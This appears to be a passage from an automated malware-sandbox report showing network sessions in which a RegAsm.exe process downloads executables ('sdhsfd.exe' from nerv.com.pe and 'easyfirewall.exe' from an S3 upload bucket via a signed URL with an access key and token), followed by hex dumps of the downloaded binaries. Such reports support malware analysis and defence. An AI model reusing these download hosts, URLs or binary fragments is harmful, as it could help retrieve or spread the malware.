                                                                                                                                                                                                                                Data Ascii: 7R_&'(wd8Gcuc:!hU'mK#wPu^H!N)cpG{.6MFEz'{4?_TE s+J<l^b#JtH4,R\g[E#0sb<+*TU!S`rA)$}
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 1c 33 92 e3 ac 14 e2 8b 5e 00 ce e9 ab 93 dd 71 36 91 3d 3c 2c 8e cd 05 1d f2 70 3f 85 60 3a ff f4 3e e7 ed b1 1e 4a f6 2c 08 dc 9f 08 33 cf 45 06 9b a3 fd a4 c7 dc 8c b6 06 ed 17 ee e7 a4 e1 f7 8c dc e7 1a 13 46 d9 68 48 03 fe 4f 22 18 e7 c7 b7 9d 4d af cf 9e 8e 31 8d 8c ba 9d a1 f3 47 5b 08 58 68 3b ac 08 65 97 6f a1 b1 b6 07 ea f1 63 d2 e7 f7 90 10 0a ad e8 6d e5 37 44 28 19 73 4f 72 73 44 71 8c 02 f3 41 9f 62 c5 b4 82 14 ac e0 2c 10 82 79 fd 8f a5 dd 32 b5 f7 15 57 f6 cf 8a 8b d1 9f 7e 38 6a 25 f0 73 18 42 7c c4 f7 24 76 b6 3f 8b f1 e9 ca 09 40 a8 0f ef b3 aa 5c 59 c8 85 2e 40 84 67 45 02 94 2b 71 9b 6e d5 63 03 81 0b 8e 28 8e 8d be 29 4a 11 28 ea d5 70 ef af fe 77 f1 1a cc 07 37 85 57 97 42 c3 9b ee c0 2b 55 27 55 f5 ed 98 f7 72 85 8b 41 95 c7 6b 6f
                                                                                                                                                                                                                                Data Ascii: 3^q6=<,p?`:>J,3EFhHO"M1G[Xh;eocm7D(sOrsDqAb,y2W~8j%sB|$v?@\Y.@gE+qnc()J(pw7WB+U'UrAko
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: cc b8 e3 b4 14 43 7a 68 87 86 22 69 88 d7 e2 28 f2 ce 34 f5 ca 2b 9b c8 71 7e 39 93 78 2d e7 06 78 2f f3 63 3c c4 15 85 b6 35 ea 3e 84 36 fe db b4 d7 07 cf 69 46 83 d0 30 8f 24 3f 59 29 f7 19 d5 de 82 de 44 49 c1 5c f7 2a 74 92 0b f3 58 ff cd 0b c0 69 02 3b 18 30 63 68 3c 97 ef 68 af 32 e6 14 e3 c4 55 e6 54 57 cf 16 5e 71 35 92 4d 2b c2 3b 09 5d c9 7f 3a b2 31 ed 0c 55 4a dd 71 b1 2f 11 85 6d 12 d1 30 61 04 e1 f5 16 72 5f 97 1e d1 31 3b 30 bc 90 32 8a 45 b6 39 51 22 01 cf 6e 27 af 4d 2a 00 49 29 d1 77 ce a3 70 a6 43 86 f4 2d af 46 9e 32 8e 9b 24 ee 7c 9f e3 ea 6f 44 5a cd bc 96 32 41 96 16 0b 88 18 f8 39 e4 62 17 8c 28 b1 a2 17 8c 0d 46 2e ac 19 43 d5 d6 0d ae cf f6 a5 95 de 37 53 80 c5 f6 6a 34 fe d1 c6 bd 04 46 08 63 00 cb fd b3 02 cb 50 b8 f0 cf 5c 7e
                                                                                                                                                                                                                                Data Ascii: Czh"i(4+q~9x-x/c<5>6iF0$?Y)DI\*tXi;0ch<h2UTW^q5M+;]:1UJq/m0ar_1;02E9Q"n'M*I)wpC-F2$|oDZ2A9b(F.C7Sj4FcP\~


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.949726162.241.61.2184436388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC197OUTGET /sdhsfd.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: nerv.com.pe
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:42 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 21:15:05 GMT
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 222112
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC7943INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 54 e5 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 0a 03 00 00 08 00 00 00 00 00 00 ee 28 03 00 00 20 00 00 00 40 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 03 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTf( @@ `
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 62 ef fb e9 33 23 45 c9 f5 b2 08 e1 66 c6 e0 60 5a 48 e1 b1 79 f5 3c 9c ba 3c da 39 5f 75 05 af bb a2 dc ae 15 19 b6 d4 d0 b8 48 e3 70 2d c1 cc 07 c1 aa 91 35 bb 71 08 fc 31 84 ac c8 0f 63 25 be e6 90 14 44 98 c3 ed 9d 36 15 70 94 1b a6 2c 85 41 ba 4b c3 9d 5f d2 83 a6 0c 99 eb de f1 da 6d 29 ec 62 1b fe 69 e6 97 ab 52 6a 4b 3a 0c 8e d0 e2 be d1 54 39 13 bd 8b 85 a3 d9 1b 36 aa 96 71 be fb 65 c0 df 52 61 73 4b e6 d6 9e ba 16 7f 94 22 1b a4 f0 43 8b 0b b3 ea f4 30 7c 1a 99 7e 7e eb 87 91 f3 c0 ec ff 9d 19 10 b5 fd c3 f7 f4 f4 aa 02 f2 95 78 d3 51 ef 49 6d a3 46 11 b9 62 8a d1 06 7d f5 31 82 3d 58 f7 09 b6 38 47 e5 da 80 ca 28 3b cd 8d 42 65 84 6f 4e 8f b8 b7 8a e1 15 cf 94 d1 e1 84 23 67 8b 5b 39 af 43 d3 fc e8 9a ed 21 01 15 c8 f4 62 42 99 64 38 69 80 10
                                                                                                                                                                                                                                Data Ascii: b3#Ef`ZHy<<9_uHp-5q1c%D6p,AK_m)biRjK:T96qeRasK"C0|~~xQImFb}1=X8G(;BeoN#g[9C!bBd8i
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 89 19 d5 7c da 9e ff 76 53 c3 2f 3a 35 47 2b b4 d2 8c 9f cd c7 f6 f9 17 20 a6 ad 03 c4 a2 10 c2 8c ad 70 05 c5 a8 b4 7d 30 9b 8d 36 28 88 3f 1c 95 fb f6 9e 67 fc 11 18 e7 65 55 d3 a5 53 03 f7 40 5f 6e 55 50 cc 4e 40 4d d8 f8 f3 e2 35 b8 44 6f d0 1a 46 2a dd d0 d2 c1 5e f5 65 67 0c 88 5a 58 f7 a8 68 98 20 cb c9 e2 ca a6 75 70 3d 80 b3 6e 84 58 a2 23 46 e0 26 7c 84 86 f2 b0 b7 15 4c 5c eb 40 24 1e 96 dc 51 5e 96 1d 63 f4 84 d4 19 5b 19 bb 46 ec 49 ac 48 c9 19 62 bf d6 9c 13 9d 5d 94 7d 94 7e d0 e0 15 a7 3a 68 24 bb 95 bf df 25 dc 7b f8 2e 3a 4a 0b 9b 38 ec b2 a7 62 ab d0 47 12 2b 41 79 7d 57 96 73 af 23 20 8d b3 18 49 ab 0f 5a e2 bf 97 65 3b d9 f5 a0 ed e6 cb 59 c5 43 ed aa 6e f3 81 5f c9 55 dc 88 9c ca 59 b0 4a 7d 9c 67 22 61 cb d6 b9 18 ef c4 84 f5 f6 e3
                                                                                                                                                                                                                                Data Ascii: |vS/:5G+ p}06(?geUS@_nUPN@M5DoF*^egZXh up=nX#F&|L\@$Q^c[FIHb]}~:h$%{.:J8bG+Ay}Ws# IZe;YCn_UYJ}g"a
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: cf c7 13 11 b5 6b ad 52 6d 32 4f e8 b7 de 2c b5 6e c0 82 41 d6 ba d7 f0 7a ca 04 94 c4 9f aa f1 4e 77 4d 9d c0 3c 3a 8f 7c 04 bb e8 d1 c5 57 53 d9 2c e7 1b 59 bf 2a 0c 13 26 e7 06 59 d2 bc 82 69 9a 6e 8a 16 ea 85 d3 f7 5d 09 a4 8e 72 a6 a8 2a 46 9b 56 96 5c 11 a9 f9 b9 02 66 d7 07 0a 8b 4c d3 5a 7f be 58 e7 4e 0b 55 09 a2 49 8e eb b2 08 97 08 96 a1 c0 8d 50 95 00 7f fb 7c d0 c2 09 82 ea 8e 67 46 24 f6 a0 d1 4b df 28 12 50 65 c0 a7 10 d8 13 19 1c 67 83 36 02 e9 0b b1 ee 7e 28 18 4a 62 8b ec 6e a3 13 27 10 9b 26 2d bd 53 77 04 24 36 40 3e a4 db 8c f5 e8 5a 0d a9 3c 93 a7 7d 47 d3 9e 1a 22 b5 bf 25 12 13 57 62 39 8f 06 57 a4 66 52 84 ce 70 fc 04 bf 3d a7 ce 18 45 9b 0a c4 dd 23 cc e5 08 31 85 78 28 dd ee c2 e7 b3 73 d9 6f 7f 4b ec d3 a0 18 35 18 78 06 99 64
                                                                                                                                                                                                                                Data Ascii: kRm2O,nAzNwM<:|WS,Y*&Yin]r*FV\fLZXNUIP|gF$K(Peg6~(Jbn'&-Sw$6@>Z<}G"%Wb9WfRp=E#1x(soK5xd
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 3a f3 7a db 8f 2f d7 2c 05 ab 3a b1 bb 35 6a 7a ee 2e ed 6d c6 82 c6 4e ab 5c f0 42 6f 04 e4 e4 60 2b 00 d5 bf 66 6c 26 f1 46 be 08 e9 9e 0c 60 37 81 6e 97 08 8c b3 79 ed bc 32 4f 44 81 19 31 05 d7 7c d7 9a 3d 52 06 14 74 ba 75 f3 d6 14 39 a3 a2 66 e1 4d e3 b9 3d b3 b4 69 26 9b d0 81 3e f8 b3 e0 15 2c eb ba 1e 00 f5 74 58 b0 b8 19 da 18 88 49 84 7f 5c 57 62 37 f3 7e f5 ca 6c 29 a2 08 44 1b c1 5a ad 6e 5e 5a 64 96 82 da 0d fe 4d 52 d9 f6 5e e5 cd 9a 0d b4 cb fd ec 39 86 ab 32 e3 bd 14 28 ff 43 48 8d d5 8f 19 ce 37 48 b5 9e 10 1e 5e 29 19 45 fa b6 f8 4c 1a 96 ad 3d f4 3c 5c a1 10 9b a1 79 d4 02 36 6c 6f 3f 5a 26 71 23 b6 0c 08 3c 00 7a 6e b8 d4 d9 14 c4 e0 7c e4 2d ec 9a 12 6d fa 25 15 76 5c b8 7d 22 23 10 8f d4 27 3d 6f 05 41 fa ab 77 95 48 a5 4c 2b f0 03
                                                                                                                                                                                                                                Data Ascii: :z/,:5jz.mN\Bo`+fl&F`7ny2OD1|=Rtu9fM=i&>,tXI\Wb7~l)DZn^ZdMR^92(CH7H^)EL=<\y6lo?Z&q#<zn|-m%v\}"#'=oAwHL+
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 64 21 3d 73 df 1c f5 28 d9 b8 7c 0f 1d 1f 5f a2 03 3a 49 8a 36 2d 02 09 76 de 9b 1b 39 1e 12 57 94 30 dd 5f 9c 95 17 c0 d8 d0 79 47 d4 9b 85 b6 30 1c 41 04 6a 84 43 d6 e5 f7 07 18 e2 b4 a5 a9 73 1b 13 70 cc 08 44 07 2d a5 ba 49 18 e7 83 2c 18 7a 9e c9 69 0e d1 b7 e3 ab 00 f6 ca 79 d7 90 e6 e9 89 26 89 85 55 e6 d1 c4 3c aa 29 f9 b4 6d 16 4e e1 c3 59 cc e1 bc bd bf 68 ec 78 54 e5 95 2d 04 1f 2a 90 2b d2 9f 0d f6 9d 8f 10 0f dd 24 de d9 64 99 91 ae 90 42 3e 15 39 7e 08 97 98 2f 6e f6 89 47 a1 59 9c 9b 85 72 d1 0f 88 2f 02 24 19 af eb 16 6d 93 ad 4e af ad e8 15 bf 6b 33 0b 2e 1f e0 7d e8 92 20 ce ef 05 79 0e 03 ec 06 30 64 d4 59 4d c4 01 06 3a 3b 6f 4d 01 53 41 73 04 18 e8 88 5d c1 0b 49 83 04 a7 23 66 2f 7d bb 9b 6d 1a 61 06 67 b3 91 17 97 12 5e ff df 28 90
                                                                                                                                                                                                                                Data Ascii: d!=s(|_:I6-v9W0_yG0AjCspD-I,ziy&U<)mNYhxT-*+$dB>9~/nGYr/$mNk3.} y0dYM:;oMSAs]I#f/}mag^(
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 89 ea 72 ff c0 79 23 13 8c 7a 47 af 50 d9 8e 0c b0 70 e5 15 a1 59 3e 84 65 ef c8 8b be 19 b7 c3 cf 21 63 a4 6c f3 9e 1b 91 35 e5 71 72 b2 a8 df c7 67 9b cc 10 99 e4 d0 53 b7 53 75 50 fa d0 d1 c1 1f 1d 69 2d 5f 6e 2a c0 e8 bc 78 93 64 3c ee 97 d1 ac 35 79 a0 d5 f7 10 0e f6 35 50 f1 a8 d5 4e c8 a9 30 59 f7 b1 37 e8 41 dc 35 05 b0 33 3f 97 ab 06 37 93 a9 e4 9e ac 3c fe 78 5b b7 cd b7 d0 bf 2a 13 0a 65 40 d9 c1 b0 e9 82 69 06 ce 50 1f 6b 7a 7f b2 bb 6a 10 bd c3 22 00 f3 00 14 c6 c1 c9 a2 9a 5a 81 c2 61 22 04 5f 20 49 2d 31 02 a7 13 d6 2a 8d 0b b9 b1 78 a6 30 d7 2d ca 62 bb 97 72 f1 e7 3e bf 47 91 d1 42 e9 9c 94 30 fa 8d 5b 30 bf 5d 5e f4 af 6a ab 9b 99 84 87 ea c8 2d b4 8b 65 75 35 19 52 bc d3 c3 bf f7 c6 24 e5 a3 b4 e8 26 f6 79 c7 d5 c6 ca 2e e1 b7 ba c7 de
                                                                                                                                                                                                                                Data Ascii: ry#zGPpY>e!cl5qrgSSuPi-_n*xd<5y5PN0Y7A53?7<x[*e@iPkzj"Za"_ I-1*x0-br>GB0[0]^j-eu5R$&y.
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 9d 7f b7 8e 3e a0 e7 34 ba 5d 1b 25 85 d0 5c b1 0b eb 8b cc c5 10 37 10 5e 25 a3 b1 5d 0c 68 04 8c 57 11 3a a1 6e e7 9b 14 38 c7 85 cf 0d df c3 a7 53 94 70 9c 9f 29 5a 7a 94 27 02 37 70 c7 26 ed 50 08 75 70 6d bc a0 02 0f 66 71 48 f4 06 cb 6d 16 3f 8d 2c ae 32 87 92 c8 1a d9 d3 d2 0f 89 38 43 21 54 b1 35 ff f3 66 aa 2f 54 14 3c b3 61 27 2d 9f fa 1a d5 47 e3 27 7c 9a 74 6a 3a bf 0e 99 68 7b 3e a9 23 15 16 9c d6 1b 40 b6 17 00 18 d0 a2 1d 27 6b 52 fe c2 7f 52 fc 76 92 85 d9 4d de 84 0f ea 9d ff 09 78 03 20 1f 7d 5c 06 a8 1c 8a fd fe 7b d2 07 b5 e2 d4 b4 27 1f 65 b9 aa 98 87 99 5c c4 c3 22 ce 15 40 5b 6b 1f 76 cb 35 43 0b 3d 40 83 15 45 ab ca 6f bb 8c 22 3b fa 4e 20 94 9b 6d ff 90 e5 c2 5a 4d 04 e0 1f e1 7f d6 b7 a8 ee 18 50 2c eb b9 b3 06 32 0c d0 d2 ba 8b
                                                                                                                                                                                                                                Data Ascii: >4]%\7^%]hW:n8Sp)Zz'7p&PupmfqHm?,28C!T5f/T<a'-G'|tj:h{>#@'kRRvMx }\{'e\"@[kv5C=@Eo";N mZMP,2
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 16 a7 2b 08 41 67 3f cc 3d 04 24 79 42 fc 27 be 2a 1a d9 e3 02 80 8f b6 1e 37 d9 1c bc dc 62 4c a5 8c 3f 7a 71 7c f6 77 10 cc 5e 2b b4 87 4b b5 8c f5 60 62 b2 d6 4f d6 5b 3f b4 4f dd 77 ae b7 63 b8 91 82 12 51 d5 48 0a 11 c7 f9 9b a5 95 ba 52 39 26 fc ea 59 da 29 3a ba 95 a9 88 84 c0 4a 1d bf 23 29 8b 37 02 65 50 0d 61 ab 77 53 3d 70 a0 ac d2 cc 9b d2 25 a7 76 c9 5f 8f 02 06 14 12 53 9a 19 52 ab f0 9a 3c a8 5f 75 7d 2b 1e 55 52 fa 9c aa c5 c1 24 06 b9 c5 19 02 b3 95 43 7a e1 1a eb 1a dc 85 17 ab 94 de c8 3f 27 29 9a 44 56 4c fb 8c 02 1d 00 50 cf 83 77 68 a3 a4 93 2d a3 2d 93 37 37 66 77 16 e1 08 db 30 c9 d5 c6 78 ce 39 bc 12 1f a8 bc 0d 8a c2 fd 78 09 63 4c 99 dc 67 0a f1 d5 61 e7 ef 33 96 a0 4f 9a 96 72 e8 26 47 7e 48 aa 3b 67 5d 34 ae 68 73 98 38 74 c4
                                                                                                                                                                                                                                Data Ascii: +Ag?=$yB'*7bL?zq|w^+K`bO[?OwcQHR9&Y):J#)7ePawS=p%v_SR<_u}+UR$Cz?')DVLPwh--77fw0x9xcLga3Or&G~H;g]4hs8t
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: a4 da 6e b2 ac 71 6e 2d ab b2 ad 47 be f6 35 26 87 88 b3 da 2a 37 c4 7a b6 ec 4c fc 8f 1e c9 8e 64 49 14 8b 6d a4 9e 88 4c 7e cc ca c5 fb 9f 78 24 5f 7e a2 be e0 24 4a 3e 03 71 63 3b 26 7d da ce 99 32 de 7a d8 b9 65 63 fc 3d 59 84 9e 9c 63 8f fa f2 27 64 29 6b b1 6d a9 31 af b0 31 ea e1 f9 26 bd 9d e3 2c ef 67 10 73 9d 5f 75 5f 5b 7b 49 ae 9e c8 58 f5 ae 13 e2 cb 7e 17 0a 56 09 2e d6 c4 60 b3 4f 1c d5 98 77 87 52 9c 7e 54 a7 01 8d 4a 90 98 8a 5b e8 0f 06 68 4f b1 e5 23 da 80 57 2a 16 6a 93 42 57 d4 d7 ec 4d 0b d2 2b 56 24 22 f9 1a 5e 16 df 80 4b 20 9a 81 b9 98 e4 ee cc 04 9d 38 f4 46 9a 84 6e 07 af df e5 8e 23 3c a3 f8 00 13 91 c3 37 d4 5c 11 8c 11 68 a7 69 ad 62 40 14 36 cd 03 f6 24 f6 fe 06 6e b1 ca dd b1 2c f5 cd aa 18 83 2c 7e 45 ae 35 53 c3 2c 98 fa
                                                                                                                                                                                                                                Data Ascii: nqn-G5&*7zLdImL~x$_~$J>qc;&}2zec=Yc'd)km11&,gs_u_[{IX~V.`OwR~TJ[hO#W*jBWM+V$"^K 8Fn#<7\hib@6$n,,~E5S,


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.94972852.217.131.814436388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC1361OUTGET /bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGNWBPVIG&Signature=RG7gLpLQM9DgrtzKECr%2F5hgaEBw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFQaCXVzLWVhc3QtMSJHMEUCIQDFdamkZ04A05ya5JjE%2BO96KfXxuSlOnxf1KU2WbhcgUAIgZVAiwI6sPTiv1NV5OPTMgcBSTcThYLQvzmHVuZLepfEqsAIIjf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEWlad7oE1ErA4%2BxniqEAkPBXDxCFRBvIDaMXH7btuCQePvBHv56Z32PJd%2BrgVAazFvcT%2BdKnWonvbgD%2Bl83gjxQvJNinimAUee0zl9An1zjHrdCynGOjIYCd10WgZZ37gvIdBvOekdVSJQN4VvROptCwbViUPgEar%2FvniBV%2B9dqfZdJIelwOng6Fln8TYeg%2Fl7wUG0nZY4e%2FMaCUav1Yku%2FrJGpCSh4n1nCWTKS7G8gb01L5gOI8TnzTwcjXoM61eavAdUsF%2FtJR2uJ0%2BlBHAgp11FQKPWY6BApQnVnlTsKXD%2Fzo4xyODNargGwFCcO8KVN97GtOSH0yfnXUN2LEsVwXZ144uxzDcaZqLaCMuxhFmrDMODaurcGOp0BK2eIjmGLV4b2uwA8kI4vRD9zrjU%2BmUC3l1cVxad27xvHP82pnJ2i1cZxwMDbzFINMt0y8GSW3msaumnuqBQuixm4zhYMg6rT6MFqZP28%2B%2FJuSlZgb%2BkDseti8cbPYao%2FN7W [TRUNCATED]
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                x-amz-id-2: BMKycSNJV932itez7JoIb+0CN6NENRFyQBqbyYwgV02C8yMoeDKTAj8ZnH5RftKLYkBev8V3+f0=
                                                                                                                                                                                                                                x-amz-request-id: 2GTSTYCSV8P5MTJS
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:44 GMT
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 17:25:15 GMT
                                                                                                                                                                                                                                ETag: "4eacb750002490284888e5adceae7ca7-3"
                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                x-amz-version-id: IVhJvkxy9Iqiznh75XtLIn3UyKmrbEmY
                                                                                                                                                                                                                                Content-Disposition: attachment; filename="easyfirewall.exe"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                Content-Length: 22487040
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC1407INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 f6 68 00 00 1c 57 01 00 2c 09 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 c0 60 01 00 04 00 00 85 2a 57 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$hW,@`*W`
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC16384INData Raw: 3d ec 68 00 90 48 83 c4 38 c3 0f 1f 80 00 00 00 00 41 55 41 54 55 57 56 53 48 81 ec 98 00 00 00 b9 0d 00 00 00 31 c0 4c 8d 44 24 20 4c 89 c7 f3 48 ab 48 8b 3d 68 54 4d 01 44 8b 0f 45 85 c9 0f 85 9c 02 00 00 65 48 8b 04 25 30 00 00 00 48 8b 1d 6c 53 4d 01 48 8b 70 08 31 ed 4c 8b 25 f3 24 5a 01 eb 16 0f 1f 44 00 00 48 39 c6 0f 84 17 02 00 00 b9 e8 03 00 00 41 ff d4 48 89 e8 f0 48 0f b1 33 48 85 c0 75 e2 48 8b 35 43 53 4d 01 31 ed 8b 06 83 f8 01 0f 84 05 02 00 00 8b 06 85 c0 0f 84 6c 02 00 00 c7 05 ee dd 50 01 01 00 00 00 8b 06 83 f8 01 0f 84 fb 01 00 00 85 ed 0f 84 14 02 00 00 48 8b 05 88 52 4d 01 48 8b 00 48 85 c0 74 0c 45 31 c0 ba 02 00 00 00 31 c9 ff d0 e8 af 40 68 00 48 8d 0d 88 43 68 00 ff 15 56 24 5a 01 48 8b 15 bb 52 4d 01 48 8d 0d 84 fd ff ff 48 89
                                                                                                                                                                                                                                Data Ascii: =hH8AUATUWVSH1LD$ LHH=hTMDEeH%0HlSMHp1L%$ZDH9AHH3HuH5CSM1lPHRMHHtE11@hHChV$ZHRMHH
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC1024INData Raw: 48 8b 70 08 48 b9 21 a6 56 6a a1 6e 75 00 48 31 d9 48 89 d0 48 89 f3 e8 85 01 00 00 48 ba bf 63 8f bb 6b ef 52 00 48 0f af c2 48 83 c4 28 5d c3 48 89 d8 48 83 c4 28 5d c3 48 89 d0 0f 1f 44 00 00 e8 9b d2 05 00 b9 18 00 00 00 48 89 c7 48 89 de 31 c0 48 8d 1d 66 11 aa 00 e8 02 f5 04 00 66 90 e8 5b 72 00 00 48 89 c3 48 8d 05 11 74 86 00 e8 6c 49 03 00 90 48 89 44 24 08 48 89 5c 24 10 90 e8 bb 69 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 0c ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 c1 00 00 00 55 48 89 e5 48 83 ec 28 48 8b 10 48 85 d2 74 72 48 83 7a 18 00 90 74 73 0f b6 72 17 40 f6 c6 20 74 30 48 8d 70 08 48 b9 21 a6 56 6a a1 6e 75 00 48 31 d9 48 89 d0 48 89 f3 e8 b8 00 00 00 48 ba bf 63 8f bb 6b ef 52 00 48 0f af c2 48 83 c4 28 5d c3 48 8b
                                                                                                                                                                                                                                Data Ascii: HpH!VjnuH1HHHckRHH(]HH(]HDHH1Hff[rHHtlIHD$H\$iHD$H\$I;fUHH(HHtrHztsr@ t0HpH!VjnuH1HHHckRHH(]H
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC15360INData Raw: cc 49 3b 66 10 0f 86 15 02 00 00 55 48 89 e5 48 83 ec 50 0f b6 48 14 f6 c1 08 0f 85 3b 01 00 00 48 89 5c 24 68 0f b6 48 17 83 e1 1f 80 f9 11 0f 86 d0 00 00 00 80 f9 14 74 26 0f 1f 80 00 00 00 00 80 f9 18 0f 84 c3 00 00 00 80 f9 19 0f 85 d2 00 00 00 48 8b 48 38 48 8b 50 40 e9 66 01 00 00 48 83 78 40 00 75 18 48 8b 0b 48 85 c9 74 06 48 8d 53 08 eb 1a 31 c0 31 db 48 83 c4 50 5d c3 48 8b 0b 48 85 c9 74 74 48 8b 49 08 48 8d 53 08 48 83 79 18 00 74 2c 0f b6 71 17 40 f6 c6 20 74 11 48 89 c8 48 89 d3 e8 56 ff ff ff 48 83 c4 50 5d c3 48 8b 1a 48 89 c8 e8 45 ff ff ff 48 83 c4 50 5d c3 48 89 c8 e8 17 ce 05 00 b9 18 00 00 00 48 89 c7 48 89 de 31 c0 48 8d 1d e2 0c aa 00 0f 1f 00 e8 7b f0 04 00 e8 d6 6d 00 00 48 89 c3 48 8d 05 ec b5 f8 00 48 83 c4 50 5d c3 31 c0 31 db
                                                                                                                                                                                                                                Data Ascii: I;fUHHPH;H\$hHt&HH8HP@fHx@uHHtHS11HP]HHttHIHSHyt,q@ tHHVHP]HHEHP]HHH1H{mHHHP]11
